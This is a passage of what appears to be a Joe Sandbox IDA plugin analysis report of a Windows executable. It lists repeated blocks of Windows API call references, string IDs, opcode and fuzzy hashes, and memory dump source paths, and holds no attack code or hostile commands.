                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                      • String ID:
                                                                      • API String ID: 87235514-0
                                                                      • Opcode ID: f246c993cedf010b928891080552d2f41f4c76e805bc6cd9e952e2ec2c1528bd
                                                                      • Instruction ID: 23044cdd6cd0a04a669df5c750bfb84f15a13e42bcd13b1429a87aa5a0dde1bc
                                                                      • Opcode Fuzzy Hash: f246c993cedf010b928891080552d2f41f4c76e805bc6cd9e952e2ec2c1528bd
                                                                      • Instruction Fuzzy Hash: 75512AA05047D13DFB3363348C85B7ABE985B06309F08898AF1E5868C2C394ED94E75A
                                                                      APIs
                                                                      • GetConsoleCP.KERNEL32(00C63CD6,?,?,?,?,?,?,?,?,00C55BA3,?,?,00C63CD6,?,?), ref: 00C55470
                                                                      • __fassign.LIBCMT ref: 00C554EB
                                                                      • __fassign.LIBCMT ref: 00C55506
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00C63CD6,00000005,00000000,00000000), ref: 00C5552C
                                                                      • WriteFile.KERNEL32(?,00C63CD6,00000000,00C55BA3,00000000,?,?,?,?,?,?,?,?,?,00C55BA3,?), ref: 00C5554B
                                                                      • WriteFile.KERNEL32(?,?,00000001,00C55BA3,00000000,?,?,?,?,?,?,?,?,?,00C55BA3,?), ref: 00C55584
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                      • String ID:
                                                                      • API String ID: 1324828854-0
                                                                      • Opcode ID: 9b622a2616059f8140783b82c6b0630c0cb964ae184d8ca7d6bb54ab141eb04e
                                                                      • Instruction ID: 817ec145bb7d238a50bdbd988008dd76080019b1772c78e83c7561b94d331252
                                                                      • Opcode Fuzzy Hash: 9b622a2616059f8140783b82c6b0630c0cb964ae184d8ca7d6bb54ab141eb04e
                                                                      • Instruction Fuzzy Hash: 455107B59006499FCB10CFA8D891BEEBBF9EF18301F14411AF955E7291E730DA85CB64
                                                                      APIs
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C42D4B
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00C42D53
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C42DE1
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00C42E0C
                                                                      • _ValidateLocalCookies.LIBCMT ref: 00C42E61
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 1170836740-1018135373
                                                                      • Opcode ID: 777162e1a9e29bc6b5e3c18b56ce1448f000ae5022c7882befbeaf6f7fed058b
                                                                      • Instruction ID: 734d3e05bba83fa0471af0813c72340929434d72df4fe6b771dac37410ee5829
                                                                      • Opcode Fuzzy Hash: 777162e1a9e29bc6b5e3c18b56ce1448f000ae5022c7882befbeaf6f7fed058b
                                                                      • Instruction Fuzzy Hash: 8D41B234E00249EBCF10DF69CC86A9EBBB5BF44324F548165F825AB392D731AA05CBD0
                                                                      APIs
                                                                        • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C8CF22,?), ref: 00C8DDFD
                                                                        • Part of subcall function 00C8DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C8CF22,?), ref: 00C8DE16
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00C8CF45
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C8CF7F
                                                                      • _wcslen.LIBCMT ref: 00C8D005
                                                                      • _wcslen.LIBCMT ref: 00C8D01B
                                                                      • SHFileOperationW.SHELL32(?), ref: 00C8D061
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 3164238972-1173974218
                                                                      • Opcode ID: b72778fea8726baee61cfe0a2d97f730276318e7003faf0d1097bd792d3147b1
                                                                      • Instruction ID: ec851b21ca98f5d8de4db1b373d88b5bbd3a9b6fbf38f9b9a3629751a93c2f3a
                                                                      • Opcode Fuzzy Hash: b72778fea8726baee61cfe0a2d97f730276318e7003faf0d1097bd792d3147b1
                                                                      • Instruction Fuzzy Hash: F94142719052185FDF12FBA4D9C1ADEB7B8AF18384F1000E6E605EB142EB34AB44DF64
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CB2E1C
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB2E4F
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB2E84
                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00CB2EB6
                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00CB2EE0
                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB2EF1
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CB2F0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 2178440468-0
                                                                      • Opcode ID: dfe2adee70f4252a8a1ebc0ca0af840716d7cfacc9d7056c111c27fcebed74a0
                                                                      • Instruction ID: b773c070c3dd81be481303d0d5673783dd881a86863e7c892a9c5563b647ba69
                                                                      • Opcode Fuzzy Hash: dfe2adee70f4252a8a1ebc0ca0af840716d7cfacc9d7056c111c27fcebed74a0
                                                                      • Instruction Fuzzy Hash: 4231F230644290EFDB218F59DC84FA937E5EB9A721F190164F9118B2B1CBB1EE40DB51
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C87769
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C8778F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C87792
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C877B0
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C877B9
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C877DE
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C877EC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 30d98a7eb86dab154199f92c69998bd6c22129c260e399eac625a9a5343dfb7e
                                                                      • Instruction ID: ba4dd7e2ac651319be5aabdf89f64f56cbe4f870b502e1f591294d158b0bff94
                                                                      • Opcode Fuzzy Hash: 30d98a7eb86dab154199f92c69998bd6c22129c260e399eac625a9a5343dfb7e
                                                                      • Instruction Fuzzy Hash: 7E21C476604219AFDF11EFA8CC88EBF73ACEB09768B148625F914DB150E670DD41CB64
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C87842
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C87868
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00C8786B
                                                                      • SysAllocString.OLEAUT32 ref: 00C8788C
                                                                      • SysFreeString.OLEAUT32 ref: 00C87895
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00C878AF
                                                                      • SysAllocString.OLEAUT32(?), ref: 00C878BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      • Opcode ID: 4b7cf7350dfefac0c26ff0a4b72f5a8b31181b9a83dffdcf169802ee361c0d75
                                                                      • Instruction ID: 81f0c56ade281ecec909af2e6a17aa281accd95b5e1c76c2b895da5a2c83ab8e
                                                                      • Opcode Fuzzy Hash: 4b7cf7350dfefac0c26ff0a4b72f5a8b31181b9a83dffdcf169802ee361c0d75
                                                                      • Instruction Fuzzy Hash: 74217731608104AFDB10AFA9DC88EBA77ECEB09764B108225F915DB2E1E674DD41CB78
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00C904F2
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C9052E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 25482ccf42341fd1376964e22218eeaa6db31b8675d4ddaa4643318e5559c703
                                                                      • Instruction ID: 0d0c56e262bad4b07d5f85011f993a57a3ee5089444e860e165eadcd6fc1ebee
                                                                      • Opcode Fuzzy Hash: 25482ccf42341fd1376964e22218eeaa6db31b8675d4ddaa4643318e5559c703
                                                                      • Instruction Fuzzy Hash: AE215A75500305AFDF209F69D849B9A7BA8AF44B64F714A29E8B1E62E0D7709A40CF24
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00C905C6
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C90601
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: c90c62a8fb0311744f27c4b592f609754ecd3fe115c9a244ce69c7e55e561dd5
                                                                      • Instruction ID: 2b1bd377f3759cd1f754cf6fbf5df1e47d2dfcffb5228585d74c9917071e9448
                                                                      • Opcode Fuzzy Hash: c90c62a8fb0311744f27c4b592f609754ecd3fe115c9a244ce69c7e55e561dd5
                                                                      • Instruction Fuzzy Hash: 36213D755003059FDF209F699848A9A77A8AF95B25F300B19FCB1E72E0D7709A60CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 348263315-3771769585
                                                                      • Opcode ID: 1fc8de045c31e0b2c1770941a9d7dfe5ab63f1d154e3ba9f2912a79021409e04
                                                                      • Instruction ID: 3a189c6961229dcf1632c25c9e7f2d0b452b92a4074fa2b525061c0b304edd7d
                                                                      • Opcode Fuzzy Hash: 1fc8de045c31e0b2c1770941a9d7dfe5ab63f1d154e3ba9f2912a79021409e04
                                                                      • Instruction Fuzzy Hash: C2115971900114AFCB24BB20DC4AFEE37ACEF10315F1001B9F146AA0D1EF719A819B64
                                                                      APIs
                                                                        • Part of subcall function 00C5D7A3: _free.LIBCMT ref: 00C5D7CC
                                                                      • _free.LIBCMT ref: 00C5D82D
                                                                        • Part of subcall function 00C529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000), ref: 00C529DE
                                                                        • Part of subcall function 00C529C8: GetLastError.KERNEL32(00000000,?,00C5D7D1,00000000,00000000,00000000,00000000,?,00C5D7F8,00000000,00000007,00000000,?,00C5DBF5,00000000,00000000), ref: 00C529F0
                                                                      • _free.LIBCMT ref: 00C5D838
                                                                      • _free.LIBCMT ref: 00C5D843
                                                                      • _free.LIBCMT ref: 00C5D897
                                                                      • _free.LIBCMT ref: 00C5D8A2
                                                                      • _free.LIBCMT ref: 00C5D8AD
                                                                      • _free.LIBCMT ref: 00C5D8B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                      • Instruction ID: 66ba420e65a1cf823148204d515842b2114572188afea480502a81a2c306e6ff
                                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                      • Instruction Fuzzy Hash: DF11B135540B04AAD531BFB0CC07FCB7BDCEF19342F400824BA9AE6992CA24B5896654
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C8DA74
                                                                      • LoadStringW.USER32(00000000), ref: 00C8DA7B
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C8DA91
                                                                      • LoadStringW.USER32(00000000), ref: 00C8DA98
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C8DADC
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00C8DAB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4072794657-3128320259
                                                                      • Opcode ID: 737da4218315c4ee19ae2d14e7367e58b65cd84e957ecab61dfd978f7c1917f1
                                                                      • Instruction ID: e1e19340adbcf361551ba28f83b119c2777deb050517fed3a7d9481aa1a63ef5
                                                                      • Opcode Fuzzy Hash: 737da4218315c4ee19ae2d14e7367e58b65cd84e957ecab61dfd978f7c1917f1
                                                                      • Instruction Fuzzy Hash: 8D0162F29402087FE711ABA49DC9FFB376CE708705F400591B706E2081EA749E844F74
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(00F4EAE8,00F4EAE8), ref: 00C9097B
                                                                      • EnterCriticalSection.KERNEL32(00F4EAC8,00000000), ref: 00C9098D
                                                                      • TerminateThread.KERNEL32(00F4EAE0,000001F6), ref: 00C9099B
                                                                      • WaitForSingleObject.KERNEL32(00F4EAE0,000003E8), ref: 00C909A9
                                                                      • CloseHandle.KERNEL32(00F4EAE0), ref: 00C909B8
                                                                      • InterlockedExchange.KERNEL32(00F4EAE8,000001F6), ref: 00C909C8
                                                                      • LeaveCriticalSection.KERNEL32(00F4EAC8), ref: 00C909CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: 1ca8d29a572ae3b7ff8c76547e4d65170e758091c5f4f47da2260b7b83d0dcdb
                                                                      • Instruction ID: fff644f1f1e00a205ed09ee00d4dfdbafb0d2cc3055f575070397b793bdfeb5a
                                                                      • Opcode Fuzzy Hash: 1ca8d29a572ae3b7ff8c76547e4d65170e758091c5f4f47da2260b7b83d0dcdb
                                                                      • Instruction Fuzzy Hash: 34F01932442A12ABDB455FA4EECCBDABA29BF01702F502226F202908A1C7749975CF91
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 00C25D30
                                                                      • GetWindowRect.USER32(?,?), ref: 00C25D71
                                                                      • ScreenToClient.USER32(?,?), ref: 00C25D99
                                                                      • GetClientRect.USER32(?,?), ref: 00C25ED7
                                                                      • GetWindowRect.USER32(?,?), ref: 00C25EF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$Screen
                                                                      • String ID:
                                                                      • API String ID: 1296646539-0
                                                                      • Opcode ID: b2d628629851a71abe5f436a9866d2b5a3d1b085cc691245937b099c67b91e87
                                                                      • Instruction ID: 7417e87ca0848837d54a78f6b5668353b15c20f217c3c9ad36fddc0b7ada4003
                                                                      • Opcode Fuzzy Hash: b2d628629851a71abe5f436a9866d2b5a3d1b085cc691245937b099c67b91e87
                                                                      • Instruction Fuzzy Hash: 11B17874A00B4ADBDB24CFA9C4807EEB7F1FF58310F14851AE8A9D7690DB34AA51DB50
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 00C500BA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C500D6
                                                                      • __allrem.LIBCMT ref: 00C500ED
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C5010B
                                                                      • __allrem.LIBCMT ref: 00C50122
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C50140
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction ID: 1204c1b6e124a4d6e77624994844cdb107d0186a3f21ac1fad389749a2a5002b
                                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction Fuzzy Hash: DB81087AA00B069BE7209F68CC42B6F77E8AF41325F24413EFC21D6681E770DA899755
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C51B9F
                                                                      • _free.LIBCMT ref: 00C51BB9
                                                                      • _free.LIBCMT ref: 00C51BC4
                                                                      • _free.LIBCMT ref: 00C51C98
                                                                      • _free.LIBCMT ref: 00C51CB4
                                                                        • Part of subcall function 00C527FC: IsProcessorFeaturePresent.KERNEL32(00000017,00C527EB,?,?,?,?,?,?,?,?,00C527F8,00000000,00000000,00000000,00000000,00000000), ref: 00C527FE
                                                                        • Part of subcall function 00C527FC: GetCurrentProcess.KERNEL32(C0000417), ref: 00C52820
                                                                        • Part of subcall function 00C527FC: TerminateProcess.KERNEL32(00000000), ref: 00C52827
                                                                      • _free.LIBCMT ref: 00C51CBE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
